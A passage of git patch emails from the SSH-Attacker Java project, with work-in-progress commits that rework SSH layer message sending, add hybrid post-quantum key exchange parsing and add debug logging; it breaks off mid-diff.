Sat, 17 Jun 2023 00:57:02 +0200 Subject: [PATCH 019/176] wip: Sending MessageKeyExchange is Working --- .../core/layer/impl/SSH2Layer.java | 6 ++++ .../core/layer/impl/TransportLayer.java | 7 ++++- .../message/KeyExchangeInitMessage.java | 5 +++ .../message/VersionExchangeMessage.java | 2 ++ .../KeyExchangeInitMessageSerializer.java | 3 +- .../core/workflow/action/MessageAction.java | 31 +++++++++++-------- .../core/workflow/action/ReceiveAction.java | 2 +- .../core/workflow/action/SendAction.java | 2 +- 8 files changed, 41 insertions(+), 17 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 9214b69aa..add6be5eb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -141,6 +141,12 @@ public LayerProcessingResult sendConfiguration() throws IOException { } } + if (runningProtocolMessageType == null) { + LOGGER.debug("[bro] Protocol Message Type is null!"); + } else { + LOGGER.debug("ProtocolMessageType: {}", runningProtocolMessageType.getValue()); + } + LOGGER.debug("[bro] " + "flushing {} to lower layer", collectedMessageStream.toByteArray()); // hand remaining serialized to record layer flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 28b7dbebf..cba31e919 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -159,6 +159,11 @@ public LayerProcessingResult sendConfiguration() throws IOException { @Override public LayerProcessingResult sendData( PacketLayerHint hint, byte[] additionalData) throws IOException { + + LOGGER.debug( + "[bro] sending hint {} with data {}", + hint.getType(), + ArrayConverter.bytesToHexString(additionalData)); ProtocolMessageType type = ProtocolMessageType.UNKNOWN; if (hint != null) { type = hint.getType(); @@ -240,7 +245,7 @@ public LayerProcessingResult sendData( addProducedContainer(packet); }*/ - getLowerLayer().sendData(null, additionalData); + getLowerLayer().sendData(null, serializedMessage); return new LayerProcessingResult<>(packets, getLayerType(), true); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/KeyExchangeInitMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/KeyExchangeInitMessage.java index c4a01849b..b46c26171 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/KeyExchangeInitMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/KeyExchangeInitMessage.java @@ -51,6 +51,11 @@ public class KeyExchangeInitMessage extends SshMessage { private ModifiableByte firstKeyExchangePacketFollows; private ModifiableInteger reserved; + public KeyExchangeInitMessage() { + super(); + this.protocolMessageType = ProtocolMessageType.SSH_MSG_KEXINIT; + } + public ModifiableByteArray getCookie() { return cookie; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java index e703249a3..14324e722 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java @@ -10,6 +10,7 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.constants.CharConstants; +import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.transport.handler.VersionExchangeMessageHandler; @@ -30,6 +31,7 @@ public class VersionExchangeMessage extends ProtocolMessage> messages = new ArrayList<>(); - protected List sessions = new ArrayList<>(); + protected List packets = new ArrayList<>(); @XmlTransient private LayerStackProcessingResult layerStackProcessingResult; @@ -276,7 +280,7 @@ private void initEmptyLists() { protected void send( SshContext sshContext, List> protocolMessagesToSend, - List sessionsToSend) + List packetsToSend) throws IOException { LayerStack layerStack = sshContext.getLayerStack(); @@ -286,12 +290,13 @@ protected void send( LayerConfiguration ssh1Configuration = new SpecificSendLayerConfiguration<>( ImplementedLayers.SSHv1, protocolMessagesToSend); - LayerConfiguration sessionConfiguration = - new SpecificSendLayerConfiguration<>(ImplementedLayers.Session, sessionsToSend); + LayerConfiguration transportConfiguration = + new SpecificSendLayerConfiguration<>( + ImplementedLayers.TransportLayer, packetsToSend); List layerConfigurationList = sortLayerConfigurations( - layerStack, ssh2Configuration, ssh1Configuration, sessionConfiguration); + layerStack, ssh2Configuration, ssh1Configuration, transportConfiguration); LayerStackProcessingResult processingResult = layerStack.sendData(layerConfigurationList); setContainers(processingResult); } @@ -314,7 +319,7 @@ private void setContainers(LayerStackProcessingResult processingResults) { } if (processingResults.getResultForLayer(ImplementedLayers.Session) != null) { - sessions = + packets = new ArrayList<>( processingResults .getResultForLayer(ImplementedLayers.Session) @@ -325,16 +330,16 @@ private void setContainers(LayerStackProcessingResult processingResults) { protected void receive( SshContext sshContext, List> protocolMessagesToReceive, - List sessionsToReceive) { + List packetsToRecieve) { LayerStack layerStack = sshContext.getLayerStack(); List layerConfigurationList; - if (protocolMessagesToReceive == null && sessionsToReceive == null) { + if (protocolMessagesToReceive == null && packetsToRecieve == null) { layerConfigurationList = getGenericReceiveConfigurations(layerStack); } else { layerConfigurationList = getSpecificReceiveConfigurations( - protocolMessagesToReceive, sessionsToReceive, layerStack); + protocolMessagesToReceive, packetsToRecieve, layerStack); } getReceiveResult(layerStack, layerConfigurationList); @@ -359,7 +364,7 @@ private List getGenericReceiveConfigurations(LayerStack laye private List getSpecificReceiveConfigurations( List> protocolMessagesToReceive, - List sessionsToReceive, + List packetsToRecieve, LayerStack layerStack) { List layerConfigurationList; @@ -371,8 +376,8 @@ private List getSpecificReceiveConfigurations( ImplementedLayers.SSHv1, protocolMessagesToReceive); LayerConfiguration recordConfiguration = new SpecificReceiveLayerConfiguration<>( - ImplementedLayers.Session, sessionsToReceive); - if (sessionsToReceive == null || sessionsToReceive.isEmpty()) { + ImplementedLayers.Session, packetsToRecieve); + if (packetsToRecieve == null || packetsToRecieve.isEmpty()) { // always allow (trailing) records when no records were set // a ReceiveAction actually intended to expect no records is pointless ((SpecificReceiveLayerConfiguration) recordConfiguration) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index 57644caaa..29dd04793 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -238,7 +238,7 @@ public void execute(State state) throws WorkflowExecutionException { throw new WorkflowExecutionException("Action already executed!"); } - receive(context, expectedMessages, sessions); + receive(context, expectedMessages, packets); /*LOGGER.debug("Receiving messages for connection alias '{}'...", getConnectionAlias()); MessageActionResult result = diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java index dbd154acf..8b19f16ec 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java @@ -101,7 +101,7 @@ public void execute(State state) throws WorkflowExecutionException { } try { - send(context, messages, sessions); + send(context, messages, packets); setExecuted(true); } catch (IOException e) { /*if (!getActionOptions().contains(ActionOption.MAY_FAIL)) { From d67624dd51cd4af21d5c46e55ff28cfab9edac2d Mon Sep 17 00:00:00 2001 From: Steffen Date: Sat, 17 Jun 2023 16:08:10 +0200 Subject: [PATCH 020/176] wip: Sending MessageKeyExchange Reply is Working --- .../core/layer/impl/SSH2Layer.java | 13 +++++- .../core/layer/impl/TransportLayer.java | 3 ++ .../HybridKeyExchangeInitMessageParser.java | 39 +++++++++++++++++- .../HybridKeyExchangeReplyMessageParser.java | 41 ++++++++++++++++++- ...bridKeyExchangeReplyMessageSerializer.java | 3 +- 5 files changed, 93 insertions(+), 6 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index add6be5eb..0ade1fa8c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -36,6 +36,7 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; +import de.rub.nds.sshattacker.core.protocol.transport.message.HybridKeyExchangeInitMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.KeyExchangeInitMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.VersionExchangeMessage; @@ -87,6 +88,7 @@ public LayerProcessingResult sendConfiguration() throws IOException { if (configuration != null && configuration.getContainerList() != null) { for (ProtocolMessage message : configuration.getContainerList()) { + collectedMessageStream = new ByteArrayOutputStream(); /* if (containerAlreadyUsedByHigherLayer(message) || !prepareDataContainer(message, context)) { @@ -138,6 +140,7 @@ public LayerProcessingResult sendConfiguration() throws IOException { runningProtocolMessageType = message.getProtocolMessageType(); processMessage(message, collectedMessageStream); addProducedContainer(message); + flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); } } @@ -149,7 +152,7 @@ public LayerProcessingResult sendConfiguration() throws IOException { LOGGER.debug("[bro] " + "flushing {} to lower layer", collectedMessageStream.toByteArray()); // hand remaining serialized to record layer - flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); + // flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); return getLayerResult(); /*LayerConfiguration configuration = getLayerConfiguration(); @@ -344,6 +347,9 @@ public void readMessageForHint(PacketLayerHint hint) { case SSH_MSG_KEXINIT: readKexInitProtocolData(); break; + case SSH_MSG_HBR_INIT: + readHbrInitProtocolData(); + break; default: LOGGER.error("Undefined record layer type, found type {}", hint.getType()); break; @@ -360,6 +366,11 @@ private void readKexInitProtocolData() { readDataContainer(message, context); } + private void readHbrInitProtocolData() { + HybridKeyExchangeInitMessage message = new HybridKeyExchangeInitMessage(); + readDataContainer(message, context); + } + private void readVersionExchangeProtocolData() { VersionExchangeMessage message = new VersionExchangeMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index cba31e919..4cd788f52 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -438,6 +438,9 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { case SSH_MSG_KEXINIT: LOGGER.debug("[bro] returning SSH KEX INIT Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXINIT); + case SSH_MSG_HBR_INIT: + LOGGER.debug("[bro] returning SSH_MSG_HBR_INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_HBR_INIT); default: LOGGER.debug( "[bro] cannot identifie {} as {} - returningn null", diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java index b78cb628c..b469c3005 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java @@ -8,6 +8,7 @@ package de.rub.nds.sshattacker.core.protocol.transport.parser; import de.rub.nds.sshattacker.core.constants.BinaryPacketConstants; +import de.rub.nds.sshattacker.core.constants.CryptoConstants; import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; @@ -38,9 +39,43 @@ public class HybridKeyExchangeInitMessageParser public HybridKeyExchangeInitMessageParser(SshContext context, InputStream stream) { super(stream); - this.combiner = combiner; + LOGGER.info( + "Negotiated Hybrid Key Exchange: " + + context.getChooser().getKeyExchangeAlgorithm()); + switch (context.getChooser().getKeyExchangeAlgorithm()) { + default: + LOGGER.warn( + "Unsupported hybrid key exchange negotiated, treating received HBR_REPLY as sntrup761x25519-sha512@openssh.com"); + // Fallthrough to next case statement intended + case SNTRUP761_X25519: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.SNTRUP761_PUBLIC_KEY_SIZE; + break; + case CURVE25519_FRODOKEM1344: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.FRODOKEM1344_PUBLIC_KEY_SIZE; + break; + case SNTRUP4591761_X25519: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.SNTRUP4591761_PUBLIC_KEY_SIZE; + break; + case NISTP521_FIRESABER: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.NISTP521_POINT_SIZE; + this.encapsulationSize = CryptoConstants.FIRESABER_PUBLIC_KEY_SIZE; + break; + case NISTP521_KYBER1024: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.NISTP521_POINT_SIZE; + this.encapsulationSize = CryptoConstants.KYBER1024_PUBLIC_KEY_SIZE; + break; + } + /* this.combiner = combiner; this.encapsulationSize = encapsulationSize; - this.agreementSize = agreementSize; + this.agreementSize = agreementSize;*/ } /*public HybridKeyExchangeInitMessageParser( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeReplyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeReplyMessageParser.java index 2eb0c8dba..3b5183efc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeReplyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeReplyMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.BinaryPacketConstants; +import de.rub.nds.sshattacker.core.constants.CryptoConstants; import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; @@ -51,9 +52,45 @@ public HybridKeyExchangeReplyMessageParser( public HybridKeyExchangeReplyMessageParser(SshContext context, InputStream stream) { super(stream); - this.agreementSize = agreementSize; + + LOGGER.info( + "Negotiated Hybrid Key Exchange: " + + context.getChooser().getKeyExchangeAlgorithm()); + switch (context.getChooser().getKeyExchangeAlgorithm()) { + default: + LOGGER.warn( + "Unsupported hybrid key exchange negotiated, treating received HBR_REPLY as sntrup761x25519-sha512@openssh.com"); + // Fallthrough to next case statement intended + case SNTRUP761_X25519: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.SNTRUP761_CIPHERTEXT_SIZE; + break; + case CURVE25519_FRODOKEM1344: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.FRODOKEM1344_CIPHERTEXT_SIZE; + break; + case SNTRUP4591761_X25519: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.SNTRUP4591761_CIPHERTEXT_SIZE; + break; + case NISTP521_FIRESABER: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.NISTP521_POINT_SIZE; + this.encapsulationSize = CryptoConstants.FIRESABER_CIPHERTEXT_SIZE; + break; + case NISTP521_KYBER1024: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.NISTP521_POINT_SIZE; + this.encapsulationSize = CryptoConstants.KYBER1024_CIPHERTEXT_SIZE; + break; + } + + /* this.agreementSize = agreementSize; this.encapsulationSize = encapsulationSize; - this.combiner = combiner; + this.combiner = combiner;*/ } private void parseHostKeyBytes(HybridKeyExchangeReplyMessage message) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java index 393b2cc02..dee75e7e6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java @@ -86,7 +86,8 @@ private void serializeSignature() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + super.serializeProtocolMessageContents(); + // serializeMessageSpecificContents(); return getAlreadySerialized(); } } From 7b7d3a4632f8c3df8232a18a2f3d270c53b7e10a Mon Sep 17 00:00:00 2001 From: Steffen Date: Sun, 18 Jun 2023 21:46:36 +0200 Subject: [PATCH 021/176] wip: Sending new Keys is working --- .../sshattacker/core/crypto/kex/XCurveEcdhKeyExchange.java | 3 +++ .../de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java | 7 +++++++ .../core/protocol/common/SshMessageSerializer.java | 7 +++++++ .../parser/HybridKeyExchangeInitMessageParser.java | 5 +++++ .../transport/serializer/NewKeysMessageSerializer.java | 3 ++- 5 files changed, 24 insertions(+), 1 deletion(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/XCurveEcdhKeyExchange.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/XCurveEcdhKeyExchange.java index 70b67a3d4..2f10064ca 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/XCurveEcdhKeyExchange.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/kex/XCurveEcdhKeyExchange.java @@ -97,6 +97,9 @@ public void computeSharedSecret() throws CryptoException { throw new CryptoException( "Unable to compute shared secret - either local key pair or remote public key is null"); } + LOGGER.debug( + "Remote Public: {}", + ArrayConverter.bytesToHexString(remotePublicKey.getCoordinate())); byte[] sharedBytes; if (group == NamedEcGroup.CURVE25519) { sharedBytes = new byte[CryptoConstants.X25519_POINT_SIZE]; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 0ade1fa8c..28047caff 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -184,6 +184,8 @@ private void processMessage( ProtocolMessagePreparator preparator = message.getPreparator(context); preparator.prepare(); + LOGGER.debug("Prepared packet"); + ProtocolMessageSerializer serializer = message.getSerializer(context); byte[] serializedMessage = serializer.serialize(); message.setCompleteResultingMessage(serializedMessage); @@ -191,6 +193,11 @@ private void processMessage( // Wird nicht benötigt, da wir keinen "Gesamt"-Digest benötigen ? // message.getHandler(context).updateDigest(message, true); + if (message.getCompleteResultingMessage().getValue()[0] + == ProtocolMessageType.SSH_MSG_HBR_REPLY.getValue()) { + message.setAdjustContext(Boolean.FALSE); + } + if (message.getAdjustContext()) { message.getHandler(context).adjustContext(message); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageSerializer.java index f90775a8d..2b19e6f98 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageSerializer.java @@ -7,15 +7,22 @@ */ package de.rub.nds.sshattacker.core.protocol.common; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + public abstract class SshMessageSerializer> extends ProtocolMessageSerializer { + private static final Logger LOGGER = LogManager.getLogger(); + public SshMessageSerializer(T message) { super(message); } // @Override protected final void serializeProtocolMessageContents() { + LOGGER.debug("[bro] while serializing ssh message"); + LOGGER.debug("[bro] id: {}", message.getMessageId().getValue()); appendByte(message.getMessageId().getValue()); serializeMessageSpecificContents(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java index b469c3005..68e186b20 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java @@ -111,6 +111,11 @@ private void parseHybridKey(HybridKeyExchangeInitMessage message) { LOGGER.warn("combiner not supported. Can not update message"); break; } + + LOGGER.debug( + "Agreement: {}, Encapsulation: {}", + message.getAgreementPublicKey(), + message.getEncapsulationPublicKey()); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java index b4b68a84b..604541da5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java @@ -21,7 +21,8 @@ public void serializeMessageSpecificContents() {} @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + super.serializeProtocolMessageContents(); + // serializeMessageSpecificContents(); return getAlreadySerialized(); } } From 1d965d6dc8a4fe6bbf2a59ff71ad283578ec4f05 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 22 Jun 2023 22:39:39 +0200 Subject: [PATCH 022/176] wip: debugging kex_init and key_repl --- .idea/compiler.xml | 8 +++++++- .../de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java | 8 +++++++- .../transport/handler/KeyExchangeInitMessageHandler.java | 5 +++++ .../sshattacker/core/workflow/action/ReceiveAction.java | 2 +- .../sshattacker/core/workflow/chooser/DefaultChooser.java | 4 ++++ 5 files changed, 24 insertions(+), 3 deletions(-) diff --git a/.idea/compiler.xml b/.idea/compiler.xml index 9e4ae7c10..00dcbef5f 100644 --- a/.idea/compiler.xml +++ b/.idea/compiler.xml @@ -9,9 +9,15 @@ - + + + + + + + \ No newline at end of file diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 28047caff..47382ad63 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -194,8 +194,14 @@ private void processMessage( // message.getHandler(context).updateDigest(message, true); if (message.getCompleteResultingMessage().getValue()[0] - == ProtocolMessageType.SSH_MSG_HBR_REPLY.getValue()) { + == ProtocolMessageType.SSH_MSG_HBR_REPLY.getValue() + || message.getCompleteResultingMessage().getValue()[0] + == ProtocolMessageType.SSH_MSG_KEXINIT.getValue()) { message.setAdjustContext(Boolean.FALSE); + } else { + LOGGER.info( + "[bro] Adjusting Context while messagetype is {}", + message.getCompleteResultingMessage().getValue()[0]); } if (message.getAdjustContext()) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java index b2820ec4e..19b30d039 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java @@ -127,6 +127,7 @@ public void adjustContext(KeyExchangeInitMessage message) { } private void pickAlgorithms() { + // if enforceSettings is true, the algorithms are expected to be // already set in the context if (!sshContext.getConfig().getEnforceSettings()) { @@ -206,6 +207,10 @@ private void pickAlgorithms() { .getServerSupportedCompressionMethodsServerToClient()) .orElse(null)); } + + LOGGER.info( + "[bro] Picking KEX Algorithm, Setting Hostkey to {}", + sshContext.getHostKeyAlgorithm()); } /*@Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index 29dd04793..73c6d0029 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -247,7 +247,7 @@ public void execute(State state) throws WorkflowExecutionException { setExecuted(true); String expected = getReadableString(expectedMessages); - LOGGER.debug("Expected messages: {}", expected); + LOGGER.info("Expected messages: {}", expected); String received = getReadableString(messages); if (hasDefaultAlias()) { LOGGER.info("Received messages: {}", received); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java index ced816497..d2aaf0a42 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java @@ -945,6 +945,10 @@ public RsaKeyExchange getRsaKeyExchange() { */ @Override public SshPublicKey getNegotiatedHostKey() { + + LOGGER.info( + "[bro] getting Negotiated algorithm, hostkey_alg is {}", + context.getSshContext().getHostKeyAlgorithm()); Optional negotiatedHostKeyAlgorithm = context.getSshContext().getHostKeyAlgorithm(); SshPublicKey fallback = config.getHostKeys().get(0); From 7482f4f14ec5b1df7b77cf50728ba65a024655e1 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 2 Jul 2023 14:46:12 +0200 Subject: [PATCH 023/176] wip: some handler and encryption choosing issues --- .../core/layer/impl/SSH2Layer.java | 29 +++++- .../core/layer/impl/TransportLayer.java | 3 + .../common/ProtocolMessageHandler.java | 1 + .../KeyExchangeInitMessageHandler.java | 98 +++++++++++++++++++ 4 files changed, 128 insertions(+), 3 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 47382ad63..36a17d932 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -32,9 +32,7 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; import 